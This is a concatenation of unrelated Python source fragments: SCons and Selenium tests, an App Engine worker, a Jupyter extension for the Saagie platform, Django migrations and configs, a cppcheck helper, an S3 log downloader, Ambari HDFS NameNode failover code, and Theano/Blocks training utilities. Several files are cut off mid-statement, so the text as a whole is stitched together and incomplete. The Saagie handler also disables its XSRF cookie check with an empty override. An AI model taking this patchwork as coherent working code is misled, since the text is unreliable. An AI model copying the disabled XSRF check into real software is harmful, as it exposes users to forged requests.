"""\ env = Environment(tools = ['default', 'swig'], CPPPATH=%(where_java_include)s, ) Java_foo_interface = env.SharedLibrary( 'Java_foo_interface', 'Java_foo_interface.i', SWIGOUTDIR = 'java/build dir', SWIGFLAGS = '-c++ -java -Wall', SWIGCXXFILESUFFIX = "_wrap.cpp") """ % locals()) test.write('Java_foo_interface.i', """\ %module foopack """) # SCons should realize that it needs to create the "java/build dir" # subdirectory to hold the generated .java files. test.run(arguments = '.') test.must_exist('java/build dir/foopackJNI.java') test.must_exist('java/build dir/foopack.java') # SCons should remove the built .java files. test.run(arguments = '-c') test.must_not_exist('java/build dir/foopackJNI.java') test.must_not_exist('java/build dir/foopack.java') # SCons should realize it needs to rebuild the removed .java files. test.not_up_to_date(arguments = '.') test.must_exist('java/build dir/foopackJNI.java') test.must_exist('java/build dir/foopack.java') test.pass_test() # Local Variables: # tab-width:4 # indent-tabs-mode:nil # End: # vim: set expandtab tabstop=4 shiftwidth=4:
# Licensed to the Software Freedom Conservancy (SFC) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The SFC licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. from selenium import webdriver from selenium.test.selenium.webdriver.common import select_class_tests from selenium.test.selenium.webdriver.common.webserver import SimpleWebServer def setup_module(module): webserver = SimpleWebServer() webserv
er.start() FirefoxSelectElementHandlingTests.webserver = webser
ver FirefoxSelectElementHandlingTests.driver = webdriver.Firefox() class FirefoxSelectElementHandlingTests(select_class_tests.WebDriverSelectSupportTests): pass def teardown_module(module): FirefoxSelectElementHandlingTests.driver.quit() FirefoxSelectElementHandlingTests.webserver.stop()
from google.appengine.ext import webapp from google.appengine.ext.webapp import util from google.appengine.api.labs import taskqueue from google.appengine.api import memcache from lifestream import * class LifeStreamQueueWorker(webapp.Reques
tHandler): def get(self): memcache.set('fresh_count', 0) indexes = LifeStream.instance().indexes for index in indexes: taskqueue.add(url='/app_worker/task', method='GET', params={'in
dex':index}) taskqueue.add(url='/app_worker/refresh', method='GET', countdown=10) class LifeStreamTaskWorker(webapp.RequestHandler): def get(self): index = int(self.request.get('index')) LifeStream.update_feed(index) class LifeStreamRefreshWorker(webapp.RequestHandler): def get(self): LifeStream.refresh_stream() def main(): application = webapp.WSGIApplication([ ('/app_worker/queue', LifeStreamQueueWorker), ('/app_worker/task', LifeStreamTaskWorker), ('/app_worker/refresh', LifeStreamRefreshWorker) ], debug=True) util.run_wsgi_app(application) if __name__ == '__main__': main()
notebook_json = data.pop('notebook_json', None) notebook = Notebook(notebook_path, notebook_json) try: template_name, template_data = views.render( view_name, notebook=notebook, data=data, method=method) except ResponseError as e:
self.send_error(e.status_code) return except: template_name = 'internal_error.html' template_data = {'error': traceback.format_exc()} self.set_status(500) template_data.update(
notebook=notebook, ) template = env.get_template(template_name) self.finish(template.render(template_data)) def get(self): self.handle_request('GET') def post(self): self.handle_request('POST') def check_xsrf_cookie(self): return class SaagieCheckHandler(IPythonHandler): def get(self): self.finish() class SaagieJobRun: def __init__(self, job, run_data): self.job = job self.id = run_data['id'] self.status = run_data['status'] self.stderr = run_data.get('logs_err', '') self.stdout = run_data.get('logs_out', '') class SaagieJob: @classmethod def from_id(cls, notebook, platform_id, job_id): return SaagieJob( notebook, requests.get(JOB_URL_PATTERN % (platform_id, job_id), auth=SAAGIE_BASIC_AUTH_TOKEN).json()) def __init__(self, notebook, job_data): self.notebook = notebook self.data = job_data self.platform_id = job_data['platform_id'] self.capsule_type = job_data['capsule_code'] self.id = job_data['id'] self.name = job_data['name'] self.last_run = None def set_as_current(self): self.notebook.current_job = self @property def url(self): return (JOBS_URL_PATTERN + '/%s') % (self.platform_id, self.id) @property def admin_url(self): return get_absolute_saagie_url('/#/manager/%s/job/%s' % (self.platform_id, self.id)) @property def logs_url(self): return self.admin_url + '/logs' @property def is_started(self): return self.last_run is not None def fetch_logs(self): job_data = requests.get(self.url, auth=SAAGIE_BASIC_AUTH_TOKEN).json() run_data = job_data.get('last_instance') if run_data is None or run_data['status'] not in ('SUCCESS', 'FAILED'): return run_data = requests.get( get_absolute_saagie_url('/api/v1/jobtask/%s' % run_data['id']), auth=SAAGIE_BASIC_AUTH_TOKEN).json() self.last_run = SaagieJobRun(self, run_data) @property def details_template_name(self): return 'include/python_job_details.html' def __str__(self): return self.name def __eq__(self, other): if other is None: return False return self.platform_id == other.platform_id and self.id == other.id def __lt__(self, other): if other is None: return False return self.id < other.id class SaagiePlatform: SUPPORTED_CAPSULE_TYPES = {'python'} def __init__(self, notebook, platform_data): self.notebook = notebook self.id = platform_data['id'] self.name = platform_data['name'] self.capsule_types = {c['code'] for c in platform_data['capsules']} @property def is_supported(self): return not self.capsule_types.isdisjoint(self.SUPPORTED_CAPSULE_TYPES) def get_jobs(self): if not self.is_supported: return [] jobs_data = requests.get(JOBS_URL_PATTERN % self.id, auth=SAAGIE_BASIC_AUTH_TOKEN).json() return [SaagieJob(self.notebook, job_data) for job_data in jobs_data if job_data['category'] == 'processing' and job_data['capsule_code'] in self.SUPPORTED_CAPSULE_TYPES] def __eq__(self, other): return self.id == other.id class Notebook: CACHE = {} def __new__(cls, path, json): if path in cls.CACHE: return cls.CACHE[path] cls.CACHE[path] = new = super(Notebook, cls).__new__(cls) return new def __init__(self, path, json_data): if path is None: path = 'Untitled.ipynb' if json_data is None: json_data = json.dumps({ 'cells': [], 'metadata': {'kernelspec': {'name': 'python3'}}}) self.path = path self.json = json.loads(json_data) # In cached instances, current_job is already defined. if not hasattr(self, 'current_job'): self.current_job = None @property def name(self): return os.path.splitext(os.path.basename(self.path))[0] @property def kernel_name(self): return self.json['metadata']['kernelspec']['name'] @property def kernel_display_name(self): return self.json['metadata']['kernelspec']['display_name'] def get_code_cells(self): return [cell['source'] for cell in self.json['cells'] if cell['cell_type'] == 'code'] def get_code(self, indices=None): cells = self.get_code_cells() if indices is None: indices = list(range(len(cells))) return '\n\n\n'.join([cells[i] for i in indices]) def get_platforms(self): return [SaagiePlatform(self, platform_data) for platform_data in requests.get(PLATFORMS_URL, auth=SAAGIE_BASIC_AUTH_TOKEN).json()] class ViewsCollection(dict): def add(self, func): self[func.__name__] = func return func def render(self, view_name, notebook, data=None, method='GET', **kwargs): if data is None: data = {} try: view = views[view_name] except KeyError: raise ResponseError(404) template_data = view(method, notebook, data, **kwargs) if isinstance(template_data, tuple): template_name, template_data = template_data else: template_name = view.__name__ + '.html' return template_name, template_data views = ViewsCollection() @views.add def modal(method, notebook, data): return {} def clear_basic_auth_token(): global SAAGIE_BASIC_AUTH_TOKEN SAAGIE_BASIC_AUTH_TOKEN = None # Init an empty Basic Auth token on first launch clear_basic_auth_token() def is_logged(): if SAAGIE_ROOT_URL is None or SAAGIE_BASIC_AUTH_TOKEN is None: return False else: # Check if Basic token is still valid is_logged_in = False try: response = requests.get(SAAGIE_ROOT_URL + '/api/v1/user-current', auth=SAAGIE_BASIC_AUTH_TOKEN, allow_redirects=False) is_logged_in = response.ok except (requests.ConnectionError, requests.RequestException, requests.HTTPError, requests.Timeout) as err: print ('Error while trying to connect to Saagie: ', err) if is_logged_in is not True: # Remove Basic Auth token from globals. It will force a new login phase. clear_basic_auth_token() return is_logged_in def define_globals(saagie_root_url, saagie_username): if saagie_root_url is not None: global SAAGIE_ROOT_URL global SAAGIE_USERNAME global PLATFORMS_URL global JOBS_URL_PATTERN global JOB_URL_PATTERN global JOB_UPGRADE_URL_PATTERN global SCRIPT_UPLOAD_URL_PATTERN SAAGIE_USERNAME = saagie_username SAAGIE_ROOT_URL = saagie_root_url.strip("/") PLATFORMS_URL = SAAGIE_ROOT_URL + '/api/v1/platform' JOBS_URL_PATTERN = PLATFORMS_URL + '/%s/job' JOB_URL_PATTERN = JOBS_URL_PATTERN + '/%s' JOB_UPGRADE_URL_PATTERN = JOBS_URL_PATTERN + '/%s/version' SCRIPT_UPLOAD_URL_PATTERN = JOBS_URL_PATTERN + '/upload' @views.add def login_form(method, notebook, data): if method == 'POST': # check if the given Saagie URL is well formed if not validators.url(data['saagie_root_url']): return {'error': 'Invalid URL', 'saagi
# -*- coding: utf-8 -*- # Generated by Django 1.10.3 on 2016-12-23 10:13 from __future__ import unicode_literals from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('blog', '0006_auto_20160321_1527'), ] operations = [ migrations.CreateModel( name='Blog
', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ], ), migrations.AddField( model_name='post', name='blog', fiel
d=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='blog.Blog'), ), ]
# Generated by D
jango 2.2.24 on 2021-10-21 02:45 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ("cases", "0015_case_is_quarantied"), ] operations = [ migrations.AddIndex( model_name="case", index=models.Index(
fields=["created"], name="cases_case_created_a615f3_idx" ), ), ]
""" WSGI config for ffstats project. This module contains the WSGI application used by Django's development server and any production WSGI deployments. It should expose a module-level variable named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover this application via the ``WSGI_APPLICATION`` setting. Usually you will have the standard Django WSGI application here, but it also might make sense to replace the whole Django WSGI application with a custom one that later delegate
s to the Django one. For example, you could introduce WSGI middleware here, or combine a Django application with an application of another framework. """ import os # We defer to a DJANGO_SETTINGS_MODULE already in the environment. This breaks # if running multiple sites in the same mod_wsgi process. To fix this, use # mod_wsgi daemon mode with each site in its own daemon process, or use # os.environ["DJANGO_SETTINGS_MODULE"] = "ffstats.settings" os.environ.setdefault("DJANGO_SETTINGS_MODULE", "ff
stats.settings") # This application object is used by any WSGI server configured to use this # file. This includes Django's development server, if the WSGI_APPLICATION # setting points here. from django.core.wsgi import get_wsgi_application application = get_wsgi_application() # Apply WSGI middleware here. # from helloworld.wsgi import HelloWorldApplication # application = HelloWorldApplication(application)
#!/usr/bin/env python from __future__ import print_function import argparse import xml.etree.ElementTree as ET def main(): parser = argparse.ArgumentParser(description="List all error without a CWE assigned in CSV format") parser.add_argument("-F", metavar="filename", requi
red=True, help="XML file containing output from: ./cppcheck --errorlist --xml-version=2") parsed = parser.parse_args() tree = ET.parse(vars(parsed)["F"]) root = tree.getroot() for child in root.iter("error"): if "cwe" not in child.attrib: print(child.attrib["id"], child.attrib["severity
"], child.attrib["verbose"], sep=", ") if __name__ == "__main__": main()
import django_filters from .models import Resource class ResourceFilter(django_filters.FilterSet)
: class Meta: model = Resource fields = [ 'title', 'description',
'domains', 'topics', 'resource_type', 'suitable_for', ]
#!/usr/bin/env python # encoding: utf-8 """ Download command for ssstat--download logs without adding to MongoDB. 2012-11-18 - Created by Jonathan Sick """ import os import logging from cliff.command import Command
import ingest_core class DownloadCommand(Command): """ssstat download""" log = logging.getLogger(__name__) def get_parser(self, progName): """Adds command line options.""" parser = super(DownloadCommand, self).get_parser(progName) parser.add_argument('log_bucket', help='Name of S3 Logging Bucket') parser.add_ar
gument('prefix', help='Prefix for the desired log files') parser.add_argument('--cache-dir', default=os.path.expandvars("$HOME/.ssstat/cache"), action='store', dest='cache_dir', help='Local directory where logs are cached') parser.add_argument('--delete', dest='delete', default=True, type=bool, help='Delete downloaded logs from S3') return parser def take_action(self, parsedArgs): """Runs the `ssstat download` command pipeline.""" self.log.debug("Running ssstat download") # Downloads logs into root of cache directory ingest_core.download_logs(parsedArgs.log_bucket, parsedArgs.prefix, parsedArgs.cache_dir, delete=parsedArgs.delete) def main(): pass if __name__ == '__main__': main()
# Co
pyright (c) 2015 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. import unittest from perf_insights import local_directory_corpus_driver cl
ass LocalDirectoryCorpusDriverTests(unittest.TestCase): def testTags(self): self.assertEquals( local_directory_corpus_driver._GetTagsForRelPath('a.json'), []) self.assertEquals( local_directory_corpus_driver._GetTagsForRelPath('/b/c/a.json'), ['b', 'c'])
""" import params # Must kinit before running the HDFS command if params.security_enabled: Execute(format("{kinit_path_local} -kt {hdfs_user_keytab} {hdfs_principal_name}"), user = params.hdfs_user) active_namenode_id = None standby_namenode_id = None active_namenodes, standby_namenodes, unknown_namenodes = get_namenode_states(params.hdfs_site, params.security_enabled, params.hdfs_user) if active_namenodes: active_namenode_id = active_namenodes[0][0] if standby_namenodes: standby_namenode_id = standby_namenodes[0][0] if active_namenode_id: Logger.info(format("Active NameNode id: {active_namenode_id}")) if standby_namenode_id: Logger.info(format("Standby NameNode id: {standby_namenode_id}")) if unknown_namenodes: for unknown_namenode in unknown_namenodes: Logger.info("NameNode HA state for {0} is unknown".format(unknown_namenode[0])) if params.namenode_id == active_namenode_id and params.other_namenode_id == standby_namenode_id: # Failover if this NameNode is active and other NameNode is up and in standby (i.e. ready to become active on failover) Logger.info(format("NameNode {namenode_id} is active and NameNode {other_namenode_id} is in standby")) failover_command = format("hdfs haadmin -ns {dfs_ha_nameservices} -failover {namenode_id} {other_namenode_id}") check_standby_cmd = format("hdfs haadmin -ns {dfs_ha_nameservices} -getServiceState {namenode_id} | grep standby") msg = "Rolling Upgrade - Initiating a ZKFC failover on active NameNode host {0}.".format(params.hostname) Logger.info(msg) code, out = shell.call(failover_command, user=params.hdfs_user, logoutput=True) Logger.info(format("Rolling Upgrade - failover command returned {code}")) wait_for_standby = False if code == 0: wait_for_standby = True else: # Try to kill ZKFC manually was_zkfc_killed = kill_zkfc(params.hdfs_user) code, out = shell.call(check_standby_cmd, user=params.hdfs_user, logoutput=True) Logger.info(format("Rolling Upgrade - check for standby returned {code}")) if code == 255 and out: Logger.info("Rolling Upgrade - NameNode is already down.") else: if was_zkfc_killed: # Only mandate that this be the standby namenode if ZKFC was indeed killed to initiate a failover. wait_for_standby = True if wait_for_standby: Logger.info("Waiting for this NameNode to become the standby one.") Execute(check_standby_cmd, user=params.hdfs_user, tries=50, try_sleep=6, logoutput=True) else: msg = "Rolling Upgrade - Skipping ZKFC failover on NameNode host {0}.".format(params.hostname) Logger.info(msg) def kill_zkfc(zkfc_user): """ There are two potential methods for failing over the namenode, especially during a Rolling Upgrade. Option 1. Kill zkfc on primary namenode provided that the secondary is up and has zkfc running on it. Option 2. Silent failover :param zkfc_user: User that started the ZKFC process. :return: Return True if ZKFC was killed, otherwise, false. """ import params if params.dfs_ha_enabled: if params.zkfc_pid_file: check_process = as_user(format("ls {zkfc_pid_file} > /dev/null 2>&1 && ps -p `cat {zkfc_pid_file}` > /dev/null 2>&1"), user=zkfc_user) code, out = shell.call(check_process) if code == 0: Logger.debug("ZKFC is running and will be killed.") kill_command = format("kill -15 `cat {zkfc_pid_file}`") Execute(kill_command, user=zkfc_user ) File(params.zkfc_pid_file, action = "delete", ) return True return False def service(action=None, name=None, user=None, options="", create_pid_dir=False, create_log_dir=False): """ :param action: Either "start" or "stop" :param name: Component name, e.g., "namenode", "datanode", "secondarynamenode", "zkfc" :param user: User to run the command as :param options: Additional options to pass to command as a string :param create_pid_dir: Create PID directory :param create_log_dir: Crate log file directory """ import params options = options if options else "" pid_dir = format("{hadoop_pid_dir_prefix}/{user}") pid_file = format("{pid_dir}/hadoop-{user}-{name}.pid") hadoop_env_exports = { 'HADOOP_LIBEXEC_DIR': params.hadoop_libexec_dir } log_dir = format("{hdfs_log_dir_prefix}/{user}") # NFS GATEWAY is always started by root using jsvc due to rpcbind bugs # on Linux such as CentOS6.2. https://bugzilla.redhat.com/show_bug.cgi?id=731542 if name == "nfs3" : import status_params pid_file = status_params.nfsgateway_pid_file custom_export = { 'HADOOP_PRIVILEGED_NFS_USER': params.hdfs_user, 'HADOOP_PRIVILEGED_NFS_PID_DIR': pid_dir, 'HADOOP_PRIVILEGED_NFS_LOG_DIR': log_dir } hadoop_env_exports.update(custom_export) process_id_exists_command = as_sudo(["t
est", "-f", pid_file]) + " && " + as_sudo(["pgrep", "-F", pid_file]) # on STOP directories shouldn't be created # since during stop still old dirs are used (which were created during previous start) if action != "
stop": if name == "nfs3": Directory(params.hadoop_pid_dir_prefix, mode=0755, owner=params.root_user, group=params.root_group ) else: Directory(params.hadoop_pid_dir_prefix, mode=0755, owner=params.hdfs_user, group=params.user_group ) if create_pid_dir: Directory(pid_dir, owner=user, group=params.user_group, create_parents = True) if create_log_dir: if name == "nfs3": Directory(log_dir, mode=0775, owner=params.root_user, group=params.user_group) else: Directory(log_dir, owner=user, group=params.user_group, create_parents = True) if params.security_enabled and name == "datanode": ## The directory where pid files are stored in the secure data environment. hadoop_secure_dn_pid_dir = format("{hadoop_pid_dir_prefix}/{hdfs_user}") hadoop_secure_dn_pid_file = format("{hadoop_secure_dn_pid_dir}/hadoop_secure_dn.pid") # At datanode_non_root stack version and further, we may start datanode as a non-root even in secure cluster if not (params.stack_version_formatted and check_stack_feature(StackFeature.DATANODE_NON_ROOT, params.stack_version_formatted)) or params.secure_dn_ports_are_in_use: user = "root" pid_file = format( "{hadoop_pid_dir_prefix}/{hdfs_user}/hadoop-{hdfs_user}-{name}.pid") if action == 'stop' and (params.stack_version_formatted and check_stack_feature(StackFeature.DATANODE_NON_ROOT, params.stack_version_formatted)) and \ os.path.isfile(hadoop_secure_dn_pid_file): # We need special handling for this case to handle the situation # when we configure non-root secure DN and then restart it # to handle new configs. Otherwise we will not be able to stop # a running instance user = "root" try: check_process_status(hadoop_secure_dn_pid_file) custom_export = { 'HADOOP_SECURE_DN_USER': params.hdfs_user } hadoop_env_exports.update(custom_export) except ComponentIsNotRunning: pass hadoop_daemon = format("{hadoop_bin}/hadoop-daemon.sh") if user == "root": cmd = [hadoop_daemon, "--config", params.hadoop_conf_dir, action, name] if options: cmd += [options, ] daemon_cmd = as_sudo(cmd) else: cmd = format("{ulimit_cmd} {hadoop_daemon} --config {hadoop_conf_dir} {action} {name}") if options: cmd += " " + options daemon_cmd = as_user(cmd, user) if action == "start": # remove pid file from dead process File(pid_file, action="delete", not_if=process_id_exists_command) try: Execute(daemon_c
import os import logging import numpy as np import theano from pandas import DataFrame, read_hdf from blocks.extensions import Printing, SimpleExtension from blocks.main_loop import MainLoop from blocks.roles import add_role logger = logging.getLogger('main.utils') def shared_param(init, name, cast_float32, role, **kwargs):
if cast_float32: v = np.float32(init) p = theano.shared(v, name=name, **kwargs) add_role(p, role) return p class AttributeDict(dict): __getattr__ = dict.__getitem__ def __setattr__(self, a, b):
self.__setitem__(a, b) class DummyLoop(MainLoop): def __init__(self, extensions): return super(DummyLoop, self).__init__(algorithm=None, data_stream=None, extensions=extensions) def run(self): for extension in self.extensions: extension.main_loop = self self._run_extensions('before_training') self._run_extensions('after_training') class ShortPrinting(Printing): def __init__(self, to_print, use_log=True, **kwargs): self.to_print = to_print self.use_log = use_log super(ShortPrinting, self).__init__(**kwargs) def do(self, which_callback, *args): log = self.main_loop.log # Iteration msg = "e {}, i {}:".format( log.status['epochs_done'], log.status['iterations_done']) # Requested channels items = [] for k, vars in self.to_print.iteritems(): for shortname, vars in vars.iteritems(): if vars is None: continue if type(vars) is not list: vars = [vars] s = "" for var in vars: try: name = k + '_' + var.name val = log.current_row[name] except: continue try: s += ' ' + ' '.join(["%.3g" % v for v in val]) except: s += " %.3g" % val if s != "": items += [shortname + s] msg = msg + ", ".join(items) if self.use_log: logger.info(msg) else: print msg class SaveParams(SimpleExtension): """Finishes the training process when triggered.""" def __init__(self, trigger_var, params, save_path, **kwargs): super(SaveParams, self).__init__(**kwargs) if trigger_var is None: self.var_name = None else: self.var_name = trigger_var[0] + '_' + trigger_var[1].name self.save_path = save_path self.params = params self.to_save = {} self.best_value = None self.add_condition(['after_training'], self.save) self.add_condition(['on_interrupt'], self.save) def save(self, which_callback, *args): if self.var_name is None: self.to_save = {v.name: v.get_value() for v in self.params} path = self.save_path + '/trained_params' logger.info('Saving to %s' % path) np.savez_compressed(path, **self.to_save) def do(self, which_callback, *args): if self.var_name is None: return val = self.main_loop.log.current_row[self.var_name] if self.best_value is None or val < self.best_value: self.best_value = val self.to_save = {v.name: v.get_value() for v in self.params} class SaveExpParams(SimpleExtension): def __init__(self, experiment_params, dir, **kwargs): super(SaveExpParams, self).__init__(**kwargs) self.dir = dir self.experiment_params = experiment_params def do(self, which_callback, *args): df = DataFrame.from_dict(self.experiment_params, orient='index') df.to_hdf(os.path.join(self.dir, 'params'), 'params', mode='w', complevel=5, complib='blosc') class SaveLog(SimpleExtension): def __init__(self, dir, show=None, **kwargs): super(SaveLog, self).__init__(**kwargs) self.dir = dir self.show = show if show is not None else [] def do(self, which_callback, *args): df = DataFrame.from_dict(self.main_loop.log, orient='index') df.to_hdf(os.path.join(self.dir, 'log'), 'log', mode='w', complevel=5, complib='blosc') def prepare_dir(save_to, results_dir='results'): base = os.path.join(results_dir, save_to) i = 0 while True: name = base + str(i) try: os.makedirs(name) break except: i += 1 return name def load_df(dirpath, filename, varname=None): varname = filename if varname is None else varname fn = os.path.join(dirpath, filename) return read_hdf(fn, varname) def filter_funcs_prefix(d, pfx): pfx = 'cmd_' fp = lambda x: x.find(pfx) return {n[fp(n) + len(pfx):]: v for n, v in d.iteritems() if fp(n) >= 0}